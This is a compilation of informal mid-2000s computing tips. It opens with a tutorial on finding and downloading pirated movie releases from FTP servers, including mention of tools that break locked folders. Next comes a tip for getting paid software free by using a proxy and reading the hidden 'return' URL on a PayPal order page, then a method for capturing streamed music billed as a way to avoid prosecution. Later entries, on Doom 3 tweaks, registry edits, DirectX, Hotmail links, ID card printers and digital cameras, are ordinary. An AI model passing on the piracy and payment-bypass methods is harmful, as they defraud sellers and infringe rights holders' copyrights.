Download Mp3's Without Using Filesharing]]]]]

This is the one wot i use to download MP3's

Download From Ftpz, Using Ftp Search Sitez

Download From Ftpz, Using Ftp Search Sitez

Downloading From Ftpz & Using Ftp Search Sitez

A Tutorial By: DeadKid

Toolz Needed:
SmartFTP [ ]
NAPALM FTP Search Site [ ] Release Nfo Site
DAMN NFO Viewer or just notepad [ ]

This tutorial is so i can stop answering tha same NewB questionz everyday
in this tutorial I'll xplain how to use search sites like NAPALM effectively.
basically better search results and a quality release.
we are gunna use a movie as tha example so here we go...
first thing I do is try and figure who all released it & if any were nuked and why
most of tha time you can find tha NFO at tha sites below - -
we are gunna use vcdquality to find out NFO on Tomb Raider: The Cradle Of Life
ok say you chose tha copy Centropy released
here is tha link to tha nfo file (( You May Wanna Get DAMN NFO Viewer B.T.W. ))
if you read it you see a section that sayz Archives [56/56*15]
ok so now ya know your looking for 2 CD'z & that are Split Rar files @ 15mb each
also you will see this (( passwd is "drudgereportdotcom" )) im sure that will help later
so now to go find tha file names by do'n a search here are some sites you can use
im gunna use NAPALM for tha example do an un-filtered search for "tomb raider centropy" without tha quotes
but I wouldn't recommend alwayz searching as above b/c
tha Name of tha Movie/App/Game/ReleaseGroup isnt alwayz gunna be in file name or url
so results could be limited but it helps on getting correct file namez
you should notice the file name seems to be in this format ctp-tr1.r54 & ctp-tr2.r54
"ctp-tr1.r54" be'n a file from CD1 and "ctp-tr2.r54" be'n a file from CD2
ok so now we know tha file names, so search for ctp-tr2.r54 and you will have more streamline results
b4 we had over 100 results from each ftp that had this movie one result per file @ over 50 files per cd
that would take way to long to go through page by page till you get to each FTP site
but now that we have tha search narrowed down by a single file name each result is a different ftp site
notice also that I searched for a high # file from cd 2 the reason for this is b/c
it is more likely that it has been fully uploaded and not missing any files b/c most people start uploading
from cd1 and in order of first split file .rar .r00 .r01 NOT from cd2 and backwards .r50 .r49 .r48
ok that wuz ez enough but now we get to tha hopefully not slow part DOWNLOADING tha filez
normally you can get better speeds from an anonymous server b/c you can use multiple connections at once
say tha server only gives ya 4k down you may be able to connect 50 times at once and get more like 200k down
but a FTP tha needs a Password and user name normally isnt that EZ
reason why is normally only 1 connection per IP is allowed
and amount of users at one time is limited to about 15 or less
so alwayz long line of peepz waiting to get in
basically even if could have more than one connection per IP
if it took 9 hrz to get access you would need to wait that long for each connection or thread
by tha time another thread connected you would have prob already finished downloading tha file anyway
NAPALM search site has nice search filter/option that will only show anonymous serverz in the results page
now open up SmartFTP and there are a few options we wanna be sure and change
Tools > Settings > General::
Set Default Download Path to whatever you want
Tools > Settings > Connection ::
Set Max Retries to -1 (( -1 = unlimited ))
Set Retry Delay to @ least 40 sec.*
*(( b/c some ftp'z will ban if you hammer/try and login to often ))
*(( read welcome messages on tha ftp log/status window for possible hammer rulez ))
Tools > Settings > Connection > Keep Alive ::
Make sure Keepalive is checked
Set interval to about 40
(( if set to low will be anoying & to high may not be effective on some sitez ))
Highlight NOOP in tha list and push Remove
Now type LIST into tha box and push tha Add
(( This is the command that keepalive uses to pretend your not idle ))
(( some ftps will kick you out if you are idle to long ))
(( and some still do with tha NOOP command we so have changed it to LIST
(( if you want you can change it to something better all i know is this works for me ))
(( nobody wants to sit 9hrz waiting to get in then get kicked out ))

SmartFTP also has Clipboard monitoring so all you need to do is have smart ftp open/running
go Back to NAPALM right click a link and select "Copy Shortcut" from tha menu and smartFtp will
popup and say FTP URL in clipboard detected if you wanna open that site Just cick yes EZ enough i think
but it can be even more simple than that if you want...

Tools > Settings > Display > Prompts ::
Uncheck: On URL Catch
(( Now it will just open tha FTP without any prompt ))

When you are conecting to ftpz you need to watch tha log/status window
For possibe crap links (( dead links and/or ratio sites ))
These are tha most common errorz to look for:

530 Account Disabled.

No connection could be made because the target machine actively refused it.

A connection attempt failed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond.

550 Permission denied. - while try'n to download a file
(( this is probably a ratio site if it has everything you ever wanted and more & looks to good to be true ))
(( it probably is and id just move on to tha next site ))

Another problem you may find on anonymous ftpz is that tha filez or folders are not there
2 reasonz for that is they were either deleted or just moved
if they were moved this could be a problem most people uploading to anonymous ftpz
make a huge maze of locked folders to hide their filez and that makes for an endless task
tryn to find the filez unless you have an app that can spider the ftp
and has tha capability to get through locked folders if so then should take only a few min
to have a list of every file on the ftp I dont know of any public app i can recommend with that capability
but they do exist... this app can get through locked folders and may kinda help seemz like a crap program
but best i could find on google in about 5 min worth of searching - has nfo about dir locking & breaking dirs

K now ill go over some basic instructions on downloading from Anonymous and NonAnonymous Sitez
or maybe i should say sites That allow more than one connection per IP and ones that Dont
we will start with anonymous or multiple thread capable FTPz
once you have tha ftp open and you see tha files you want just drag and drop them into
the Global Queue tab on tha transfers window and then just push the start button
should have tha in speed @ bottom right status bar if its not going fast enough
you can adjust tha amount of connections/threads you have running
keep adding threads until your bandwidth is maxed or until your total In speed doesnt get any faster
another thing you may wanna keep in mind is that you can connect to more than one ftp
downloading CD1 from one site and CD2 from the other etc. for a combined speed
now we go onto NonAnonymous Sitez.... You cant use Global Queue b/c you cant have multiple threads
so just right click tha file or folder you want and select Download > Direct > Select Folder
most of these sites will be slow and could take hrz maybe dayz to get into
so what i do is just open every single result in NAPALM at tha same time
I figure i have a better chance waiting on 10 sitez then 1
so when you have them all open just close out tha ones that have tha errors mentioned above
then you can walk away and check every so often to see if you have gotten in one yet
this is where tha keepalive option helps out and of course if you happen to get into more than one @ a time
just go for tha combined speed method if going slow

thats about it, all simple stuff but seems to be tha best process i have found
hope this helpz happy hunting

Download from a paypal site without paying a penny!

Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:

About half way down the page you will find:

<input type="hidden" name="return" value=" ">

Copy the link into your browser and download.

Download Free Music legally,, legally

Are you scared that the RIAA is about to track you down for illegally downloading songs.
Well, here is a method of obtaining many songs absolutely free that is virtually untrackable
by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not
are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp:// . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique which is manually recording streaming audio, with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort such as with "mms://" files. There is a degredation in quality compared to the other formats and it records every sound your PC makes while it is recording so don't chat on AIM while recording (lol I can hear random doors slamming now).

Dos User - No Boot Dos Disk, No,How to create Imp Files

 Hello Dos friends
This is a simple but most forgotton command to create
files like config.sys and autoexec.bat files, well heres it...
Even if u dont have a dos boot disk u can work ur way
to some extent.
At c:\ prompt
copy con config.sys
devicehigh=c:\dos\emm386.exe ram
last drive=z
then press CTRL + z
press enter
Config.sys file will be created.
Similarly u can create autoexec.bat
@echo off
lh mouse
lh doskey
Press CTRL + Z

Doom3 Simple Tweeks, how to run doom with tweeks

Ok I am running Amd Athlon 1800 1.15 GHz 384 ram With a Gforce2
when I installed the game and attempted to play I got a whopping 2 fps to 4 fps to see what your FPS are put this in consol com_showFPS "1" or set com_showFPS "1" in config file
After I change some in game settings like
600x800 and low quality
Advance setting: I have High Quality Special affect checked yes and Enable Bump maps Yes all the rest are checked no.
After I did these things I am getting average of 21 fps to 35 fps and in high action areas they drop to 15 FPS
so this is what I did to my DoomConfig.
seta image_downSizeLimit "512" CHANGED THIS FROM 256
seta image_downSizeBumpLimit "512" CHANGED THIS FROM 256

Here is actual config just make a back up of your config and copy and paste. Try mine if you have an old Graphix card.

// IvL/FblnaU4w6bO89mN9XIzJKwdEz1acOB3LQ6Vj2NWPrRjcMHDUWwpZzE/zePncK8JfwT1h1fHq+5XRCsM=
bind "TAB" "_impulse19"
bind "ENTER" "_button2"
bind "ESCAPE" "togglemenu"
bind "/" "_impulse14"
bind "0" "_impulse10"
bind "1" "_impulse0"
bind "2" "_impulse1"
bind "3" "_impulse2"
bind "4" "_impulse3"
bind "5" "_impulse4"
bind "6" "_impulse5"
bind "7" "_impulse6"
bind "8" "_impulse7"
bind "9" "_impulse8"
bind "[" "_impulse15"
bind "\\" "_mlook"
bind "]" "_impulse14"
bind "a" "_moveleft"
bind "c" "_movedown"
bind "d" "_moveright"
bind "f" "_impulse11"
bind "q" "_impulse9"
bind "r" "_impulse13"
bind "t" "clientMessageMode"
bind "y" "clientMessageMode 1"
bind "z" "_zoom"
bind "BACKSPACE" "clientDropWeapon"
bind "PAUSE" "pause"
bind "UPARROW" "_forward"
bind "DOWNARROW" "_back"
bind "LEFTARROW" "_moveLeft"
bind "RIGHTARROW" "_moveRight"
bind "ALT" "_strafe"
bind "CTRL" "_moveDown"
bind "SHIFT" "_forward"
bind "DEL" "_lookdown"
bind "PGDN" "_lookup"
bind "END" "_impulse18"
bind "F1" "_impulse28"
bind "F2" "_impulse29"
bind "F3" "_impulse17"
bind "F5" "savegame quick"
bind "F6" "_impulse20"
bind "F7" "_impulse22"
bind "F9" "loadgame quick"
bind "F12" "screenshot"
bind "KP_LEFTARROW" "_moveUp"
bind "KP_END" "_speed"
bind "KP_INS" "_impulse13"
bind "MOUSE1" "_attack"
bind "MOUSE3" "_zoom"
bind "MWHEELDOWN" "_impulse14"
bind "MWHEELUP" "_impulse15"
seta radiant_entityMode "0"
seta gui_mediumFontLimit "0.60"
seta gui_smallFontLimit "0.30"
seta net_socksPassword ""
seta net_socksUsername ""
seta net_socksPort "1080"
seta net_socksServer ""
seta net_socksEnabled "0"
seta win_ypos "22"
seta win_xpos "3"
seta sys_lang "english"
seta s_numberOfSpeakers "2"
seta s_doorDistanceAdd "150"
seta s_globalFraction "0.8"
seta s_subFraction "0.75"
seta s_playDefaultSound "1"
seta s_volume_dB "0"
seta s_meterTopTime "2000"
seta s_reverse "0"
seta s_spatializationDecay "2"
seta s_maxSoundsPerShader "1"
seta r_debugArrowStep "120"
seta r_debugLineWidth "1"
seta r_debugLineDepthTest "0"
seta r_cgFragmentProfile "best"
seta r_cgVertexProfile "best"
seta r_forceLoadImages "1"
seta r_shadows "0"
seta r_skipBump "0"
seta r_skipSpecular "1"
seta r_skipNewAmbient "0"
seta r_renderer "best"
seta r_brightness "1.595238"
seta r_gamma "1.3"
seta r_swapInterval "0"
seta r_useIndexBuffers "0"
seta r_customHeight "486"
seta r_customWidth "720"
seta r_fullscreen "1"
seta r_mode "4"
seta r_multiSamples "0"
seta image_downSizeLimit "512"
seta image_ignoreHighQuality "1"
seta image_downSizeBumpLimit "512"
seta image_downSizeSpecularLimit "64"
seta image_downSizeBump "1"
seta image_downSizeSpecular "1"
seta image_useCache "1"
seta image_cacheMegs "128"
seta image_cacheMinK "10240"
seta image_usePrecompressedTextures "1"
seta image_useNormalCompression "1"
seta image_useAllFormats "1"
seta image_useCompression "1"
seta image_roundDown "1"
seta image_forceDownSize "0"
seta image_downSize "1"
seta image_lodbias "0"
seta image_anisotropy "0"
seta image_filter "GL_LINEAR_MIPMAP_LINEAR"
seta gui_filter_gameType "0"
seta gui_filter_players "0"
seta gui_filter_password "0"
seta net_master4 ""
seta net_master3 ""
seta net_master2 ""
seta net_master1 ""
seta net_clientMaxRate "16000"
seta net_serverMaxClientRate "16000"
seta m_strafeSmooth "4"
seta m_smooth "1"
seta m_strafeScale "6.25"
seta m_yaw "0.022"
seta m_pitch "0.022"
seta sensitivity "5"
seta in_alwaysRun "0"
seta in_freeLook "1"
seta in_anglespeedkey "1.5"
seta in_pitchspeed "140"
seta in_yawspeed "140"
seta gui_configServerRate "0"
seta com_guid ""
seta com_showFPS "1"
seta com_purgeAll "1"
seta com_machineSpec "0"
seta g_decals "0"
seta g_projectileLights "0"
seta g_doubleVision "0"
seta g_muzzleFlash "0"
seta mod_validSkins "skins/characters/player/marine_mp;skins/characters/player/marine_mp_green;skins/characters/player/marine_mp_blue;skins/characters/player/marine_mp_red;skins/characters/player/marine_mp_yellow"
seta g_mapCycle "mapcycle"
seta g_voteFlags "0"
seta g_gameReviewPause "10"
seta g_countDown "10"
seta g_password ""
seta g_showBrass "1"
seta g_showProjectilePct "0"
seta g_showHud "1"
seta g_showPlayerShadow "0"
seta g_showcamerainfo "0"
seta g_healthTakeLimit "25"
seta g_healthTakeAmt "5"
seta g_healthTakeTime "5"
seta g_useDynamicProtection "1"
seta g_armorProtectionMP "0.6"
seta g_armorProtection "0.3"
seta g_damageScale "1"
seta g_nightmare "0"
seta g_bloodEffects "1"
seta ui_showGun "1"
seta ui_autoReload "1"
seta ui_autoSwitch "1"
seta ui_team "Blue"
seta ui_skin "skins/characters/player/marine_mp"
seta ui_name "Player"
seta si_spectators "1"
seta si_usePass "0"
seta si_warmup "0"
seta si_teamDamage "0"
seta si_timeLimit "10"
seta si_fragLimit "10"
seta si_maxPlayers "4"
seta si_map "game/mp/d3dm1"
seta si_gameType "singleplayer"
seta si_name "DOOM Server"
seta g_spectatorChat "0"

After I that game runs at bearable frame rate and I must say this is a beautful game! Hope this helps some one Sorry if I put this post in wrong spot did not see game support. Thank you for the quick reply of misplacement

Doom 3 Speed Up, Guaranteed 40% better


First, open your doom3\base folder. Doubleclick on the pak000.pk4 file. In the "window can't open this file .. .bla bla" dialog, go on and associate the file with an app like WinRar. With this file open in WinRar, go to the glprogs directory in the file. In there you'll find the shaders. The interaction.vfp file seems to be the main rendering shader. Altering this shader to output a constant color turns most objects into that constant color, except for stuff like computer screens etc.

So doubleclick the interaction.vfp file to open it (you may have to associate the .vfp extension with a text editor like notepad or wordpad first since we're going to edit the file). Scroll down to the fragment shader. You'll find these rows:


PARAM subOne = { -1, -1, -1, -1 };
PARAM scaleTwo = { 2, 2, 2, 2 };

Add this right below them:


PARAM specExp = { 16, 0, 0, 0 };

Now scroll down to this:


# perform a dependent table read for the specular falloff
TEX R1, specular, texture[6], 2D;

Comment out that line by adding a "#" to it, and add another line that will do the same thing with math instead, so it should look like this:


# perform a dependent table read for the specular falloff
# TEX R1, specular, texture[6], 2D;
POW R1, specular.x, specExp.x;

Save the file and close your text editor. WinRar will ask if you want to update the file in the archive, select yes. Close WinRar and enjoy about 40% higher performance in Doom3.3 Speed Up, Guaranteed 40% better

Do You Want To Learn Maya 6, look, some tutorials

interesting tuts for Maya 6 

Discover New Music You'll Probably Love

First off, I've been doing this for a long time now. I still listen to a lot of the bands I've found by doing this. It's really simple, but it works like a charm. I ALWAYS find cool new stuff -- sometimes even bands that have been around 10 years that I never heard of.

The things you need:
- (Optional) A file sharing program (I use limewire)
- A browser. :]

1.) Pick one of your favorite bands.
2.) Go to or (same thing)
3.) Look up that band's name
4.) Scroll down until you see "Customers who bought this title also bought:"
5.) Browse through the artists you've never heard of in that list.
6.) Check out one of their albums, preferably the one with highest rating (in stars)
7.) Either listen to the samples on amazon or download a song by them with your filesharing app.

If you like what you hear, repeat steps 3-7 using the new band's name.

You'll find TONS of new music you never thought existed.

It's a really simple way to find stuff, and I'm sure lots of you probably already do this. But for those who don't -- you'll thank me later. It works wonders. :)

Disable The Send Error Report, to Microsoft

To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:


Open Control Panel
Click on Preformance and Maintenance.
Click on System.
Then click on the Advanced tab
Click on the error reporting button on the bottom of the windows.
Select Disable error reporting.
Click OK
Click OK


Disable Compression On Xp, NTFS partition, Disk Cleanup

On an NTFS partition, Disk Cleanup can compress old files
to save space. But calculating the savings and performing
the compression often take a long time, and on some systems,
Disk Cleanup hangs during the process. If that happens, or if
you don't care to wait, use this Registry tweak to disable the
compression: Delete the key
HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

DirectX explained

 DirectX explained

Ever wondered just what that enigmatic name means?

Gaming and multimedia applications are some of the most satisfying programs you can get for your PC, but getting them to run properly isn’t always as easy as it could be. First, the PC architecture was never designed as a gaming platform. Second, the wide-ranging nature of the PC means that one person’s machine can be different from another. While games consoles all contain the same hardware, PCs don’t: the massive range of difference can make gaming a headache.

To alleviate as much of the pain as possible, Microsoft needed to introduce a common standard which all games and multimedia applications could follow – a common interface between the OS and whatever hardware is installed in the PC, if you like. This common interface is DirectX, something which can be the source of much confusion.

DirectX is an interface designed to make certain programming tasks much easier, for both the game developer and the rest of us who just want to sit down and play the latest blockbuster. Before we can explain what DirectX is and how it works though, we need a little history lesson.

DirectX history
Any game needs to perform certain tasks again and again. It needs to watch for your input from mouse, joystick or keyboard, and it needs to be able to display screen images and play sounds or music. That’s pretty much any game at the most simplistic level.

Imagine how incredibly complex this was for programmers developing on the early pre-Windows PC architecture, then. Each programmer needed to develop their own way of reading the keyboard or detecting whether a joystick was even attached, let alone being used to play the game. Specific routines were needed even to display the simplest of images on the screen or play a simple sound.

Essentially, the game programmers were talking directly to your PC’s hardware at a fundamental level. When Microsoft introduced Windows, it was imperative for the stability and success of the PC platform that things were made easier for both the developer and the player. After all, who would bother writing games for a machine when they had to reinvent the wheel every time they began work on a new game? Microsoft’s idea was simple: stop programmers talking directly to the hardware, and build a common toolkit which they could use instead. DirectX was born.

How it works
At the most basic level, DirectX is an interface between the hardware in your PC and Windows itself, part of the Windows API or Application Programming Interface. Let’s look at a practical example. When a game developer wants to play a sound file, it’s simply a case of using the correct library function. When the game runs, this calls the DirectX API, which in turn plays the sound file. The developer doesn’t need to know what type of sound card he’s dealing with, what it’s capable of, or how to talk to it. Microsoft has provided DirectX, and the sound card manufacturer has provided a DirectX-capable driver. He asks for the sound to be played, and it is – whichever machine it runs on.

From our point of view as gamers, DirectX also makes things incredibly easy – at least in theory. You install a new sound card in place of your old one, and it comes with a DirectX driver. Next time you play your favourite game you can still hear sounds and music, and you haven’t had to make any complex configuration changes.

Originally, DirectX began life as a simple toolkit: early hardware was limited and only the most basic graphical functions were required. As hardware and software has evolved in complexity, so has DirectX. It’s now much more than a graphical toolkit, and the term has come to encompass a massive selection of routines which deal with all sorts of hardware communication. For example, the DirectInput routines can deal with all sorts of input devices, from simple two-button mice to complex flight joysticks. Other parts include DirectSound for audio devices and DirectPlay provides a toolkit for online or multiplayer gaming.

DirectX versions
The current version of DirectX at time of writing is DirectX 9.0. This runs on all versions of Windows from Windows 98 up to and including Windows Server 2003 along with every revision in between. It doesn’t run on Windows 95 though: if you have a machine with Windows 95 installed, you’re stuck with the older and less capable 8.0a. Windows NT 4 also requires a specific version – in this case, it’s DirectX 3.0a.

With so many versions of DirectX available over the years, it becomes difficult to keep track of which version you need. In all but the most rare cases, all versions of DirectX are backwardly compatible – games which say they require DirectX 7 will happily run with more recent versions, but not with older copies. Many current titles explicitly state that they require DirectX 9, and won’t run without the latest version installed. This is because they make use of new features introduced with this version, although it has been known for lazy developers to specify the very latest version as a requirement when the game in question doesn’t use any of the new enhancements. Generally speaking though, if a title is version locked like this, you will need to upgrade before you can play. Improvements to the core DirectX code mean you may even see improvements in many titles when you upgrade to the latest build of DirectX. Downloading and installing DirectX need not be complex, either.

Upgrading DirectX
All available versions of Windows come with DirectX in one form or another as a core system component which cannot be removed, so you should always have at least a basic implementation of the system installed on your PC. However, many new games require the very latest version before they work properly, or even at all.

Generally, the best place to install the latest version of DirectX from is the dedicated section of the Microsoft Web site, which is found at As we went to press, the most recent build available for general download was DirectX 9.0b. You can download either a simple installer which will in turn download the components your system requires as it installs, or download the complete distribution package in one go for later offline installation.

Another good source for DirectX is games themselves. If a game requires a specific version, it’ll be on the installation CD and may even be installed automatically by the game’s installer itself. You won’t find it on magazine cover discs though, thanks to Microsoft’s licensing terms.

Diagnosing problems

Diagnosing problems with a DirectX installation can be problematic, especially if you don’t know which one of the many components is causing your newly purchased game to fall over. Thankfully, Microsoft provides a useful utility called the DirectX Diagnostic Tool, although this isn’t made obvious. You won’t find this tool in the Start Menu with any version of Windows, and each tends to install it in a different place.

The easiest way to use it is to open the Start Menu’s Run dialog, type in dxdiag and then click OK. When the application first loads, it takes a few seconds to interrogate your DirectX installation and find any problems. First, the DirectX Files tab displays version information on each one of the files your installation uses. The Notes section at the bottom is worth checking, as missing or corrupted files will be flagged here.

The tabs marked Display, Sound, Music, Input and Network all relate to specific areas of DirectX, and all but the Input tab provide tools to test the correct functioning on your hardware. Finally, the More Help tab provides a useful way to start the DirectX Troubleshooter, Microsoft’s simple linear problem solving tool for many common DirectX issues.

Direct Link To Any Page You Want To In Hotmail

Direct Link To Any Page You Want To In Hotmail

This tutorial is for people that don't know how to direct link to .php pages on the web. If you are on a private computer, and don't mind auto-logging in, you will be able to access your folders much faster than going straight to

You will need a bit of information. Log into the hotmail main page. You will see a web address similar to the following:

It won't be exactly the same but it will be similar.

It's time to shorten this up. The only bit of information you really need is the direct web address to the server that contains your particular account. In the above example, you would just need:


Just copy this section from your particular server addy in your browser's address bar.

Now that the explanation is over, these are the commands you can append to the above example to reach specific pages.

'hmhome' - MSN Hotmail - Today
'HoTMaiL' - Inbox
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000005' - Junk E-Mail
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000004' - Drafts
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000003' - Sent Messages
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000002' - Trash Can
'compose' - Compose Message
'addresses' - Address Book
'options' - Options, Duh
'options?section=mail' - Mail Options
'options?section=personal' - Personal Details
'protect?screen=filter' - Junkmail Filter
'options?section=contacts' - Contact Options


Remember, you just need to place these commands directly after 'http://.../cgi-bin/' without spaces.

If you have never tried this before, it works on many websites. So, if you don't like navigating websites, and would rather do that through your web-browser, go ahead and do it.

Digital Photo ID Cards

Digital Photo ID Cards

Q: What do you need to make a Digital Photo ID Card?
A: Making digital photo ID cards typically requires several components all working together.
1. You need a computer on which you run the photo ID badge software. You cannot print the cards on a PVC card printer without a computer – the printer can't perform anything without the computer.
2. You need software and it must:
a) Offer a database to store the names and personal information of the people for whom you want to issue badges.
b) Provide a way to integrate image capture with the database – not only import images, but associate the images with specific database records.
c) Provide a way to design and edit badges.
d) Send badges from the computer to a card printer. Badging software, like other business applications, comes in a variety of "flavors" – from low-end to high-end. That is, in addition to performing the simple processes described above, the application may come with many other "features" which enhance the usability and functionality of the application. Features might include requiring a secure log-on, allowing the user to add, delete, or edit database fields and create or print reports, etc.
3. You need a PVC card printer to print the badges. PVC (polyvinylchloride) is the same material that your white plastic household plumbing pipes are made out of. It is porous enough to allow colored inks to be absorbed into the surface of the plastic using a "dye sublimation" process, yet durable enough to last years. The PVC printer allows you to print a photo ID badge directly to a plastic card. The non-digital process required cutting and pasting an instant photo and inserting it into a laminated pouch which must then be sealed by sending it through a heat laminator.
4. You need a digital camera or other "input" device. Your PC and software must allow you to:
a) Plug in a camera.
b) Capture the image through the software. More versatile systems will allow you to capture portraits through video cameras, digital cameras, scanners, or by importing from a file –an "import from file" feature allows someone to send a picture to you by email as a file attachment, which you can then import into the database.
5. Additional hardware may be required, such as a video capture board for certain video cameras, tape backup device, UPS (uninterrupted power supply), etc. Video capture boards, for example, are installed in a PCI or AGP expansion slot on your PC's motherboard. The camera usually plugs directly into these boards. Special lighting may need to be set up where you take portrait pictures. If you want to incorporate fingerprints and signatures in your database and badge, then additional image capture devices will be required for them.
6. Consumables are also part of the package. You will need blank or pre-printed PVC cards and printer ribbons (usually in rolls which print from 250-350 cards per).

Digital Camera Guide

Digital Camera Guide

So, it's time for a digital camera huh? Well, buying one can be more than a little difficult. What types of features should you look for? Well, this guide will tell you that plus get you a little more familiar with what these cameras are capable of.

When it comes to megapixels, the more the better. I recommend a minimum of 2, but 3 or 4 is great. We did a test to see if a camera with 2.3 megapixels (actually 1.92 - 1600 x 1200) could produce a good quality 8x10.

Turns out it can, if you have the right paper and printer. We used HP Premium Plus photo paper with an HP 970 series printer and made a fantastic 8 x 10. Remember, I was a professional photographer before I got into computing, so I know a good print when I see it :-)

The resolution at 8x10 (we had to crop in to make the picture proportional to 8x10) was only 150 DPI. Most printers would not make a real good 8x10 at that resolution, but this one did. So, if you want to be sure you can get good 8 x 10s, you may want to go with a 3 megapixel camera or better (that gives you around 200 DPI at 8x10 size, still not quite the optimum 300 DPI, but it looks good with the right printer).

Optical vs Digital Zoom
You've probably noticed that most digital cameras have both a specification for digital and optical zoom. Pay the most attention to the optical zoom.

The optical zoom magnifies (zooms in) using glass. The digital zoom basically crops out the edge of the picture to make the subject appear closer, causing you to lose resolution or to get an interpolated resolution (i.e. the camera adds pixels). Neither of which help image quality.

Finally, make sure you get enough (optical) zoom. A 2x zoom isn't going to do much for you. A 3x is the average you'll find in most digital cameras will probably be good for most uses. More on lenses later.

How does the camera connect to your computer? If you have a USB port in your computer, you'll want a camera that can connect via USB as opposed to a slow serial connection.

On the other hand, if your computer doesn't have a USB port, is there a serial connector available for the camera you're looking at? If so, is it a special order and how long does it take to get it?

What does the camera use to store images with? If it uses a memory stick, make sure you consider buying additional sticks when you get your camera. A typical 8 meg memory stick that comes with a 2 megapixel camera only holds 5 or 6 images at the camera's best quality.

Some cameras use a 3.5 inch disk for storage. Be careful of these!
Although it may sound like a good idea, a 3 megapixel camera at high resolution produces a 1 meg file (compressed!). That's only 1 picture per disk.

Here's a few more things to look out for when trying to make your digital camera purchase.

Picture Formats
When you're trying to decide on which digital camera to get, check and see how many different picture formats it supports.

You want something that can produce both uncompressed (usually TIFF) and compressed (usually JPEG) images. I personally use the high quality JPEG setting on my camera for most of my shooting. TIFFs are just too big and the difference in quality is not ascertainable by mere mortals.

You also want to be able to shoot at a lower resolution than the camera's maximum. That way, If you're running short on memory, you can squeeze a few more shots on your memory stick.

Auxiliary Lens / Flash
This was a biggie for me. While a 3x zoom may work for the "average" user, I needed something that allowed me to do some wide angle work as well as have a good telephoto lens.

So, the camera I purchased a few months back was a Nikon Coolpix 990 (note that this isn't the only camera that can accept lenses). It has auxiliary lenses that screw into the filter ring on the front of the lens. I now have an ultra-wide fisheye lens plus a nice telephoto.

In addition to lenses, I wanted a good flash. The flash that is built into most of these cameras gives you a top range of 15-20 feet - at best. I wanted a camera that could take a powerful auxiliary flash (again, the Nikon isn't the only camera that fits this requirement, but I liked it better than the rest). If you need more reach than the small built in flash can deliver, then make sure you can attach an external flash to any camera you consider.

As an added bonus, if you get a camera that can take an external flash, you can place that flash on a bracket and eliminate red-eye.

Flash Distance
Speaking of flashes, make sure you check the distance the built in flash is good for. You don't want a camera with a wimpy flash that only travels a few feet (well, unless you can get an external flash for it as described above).

Battery Type
This may not sound important, but it is. Anyone who owns a digital camera can tell you they eat batteries the way a sumo wrestler eats at a buffet.

Make sure the camera can run on regular (or rechargeable) "AA" type batteries. You don't want a camera that eats through expensive lithium batteries every 10 shots or so.

One thing to remember about digital cameras, they do eat through batteries. I recommend getting some Nickel Metal Hydride rechargeable for it. I have some for mine and they have saved me a fortune.

Final Notes
Choosing a digital camera isn't easy. There's a huge selection out there and only you can determine which features you need.

For instance, if you shoot wildlife photos, a small 3x zoom probably isn't going to cut it (unless you can attach auxiliary lenses to it). If you shoot lots of close-ups, make sure the camera has some sort of macro capability. If you shoot big group photos indoors, an external flash may be necessary.

My advice is to make a list of things you want to be able to do with the camera then go to somewhere that can help you make a good purchase decision.

Finally, buy the BEST camera you can possibly afford. Or wait until the price drops on one with the type of features you want.

Delete Files From The Recent File List In Windows

This tip requires a change to the Windows Registry. Please see the MSFN Guide "Backup Your Registry" if you are new to the Windows Registry.

Windows Media Player (WMP) is a built-in application that allows you to play multimedia files. Like many other applications, WMP remembers the most recently played files and displays them in the Recent File List under the File menu. This feature is useful if you regularly play certain files, but you may want to clear the list if you share the computer and a user account or create archives and CDs.

There are two ways you can clear the list:

I. The ClearMRU.exe Utility is available for free in the Windows Media Player Bonus Pack from Microsoft, but Microsoft does not support this tool.

II. You can also manually delete the list through the Windows Registry:

1. Start the Windows Registry Editor, regedit.exe, by typing regedit in the Windows Run Command Line.

2. Go to HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList.

3. Delete the RecentFileList subkey.

4. If you've also streamed content from the Internet, you can delete the RecentURLList subkey.

5. Exit the Registry Editor.

6. Restart the computer.

To keep certain files in the list, don't delete the entire key. Deleting individual entries within the key will get rid of the files that you no longer want in the Recent File List.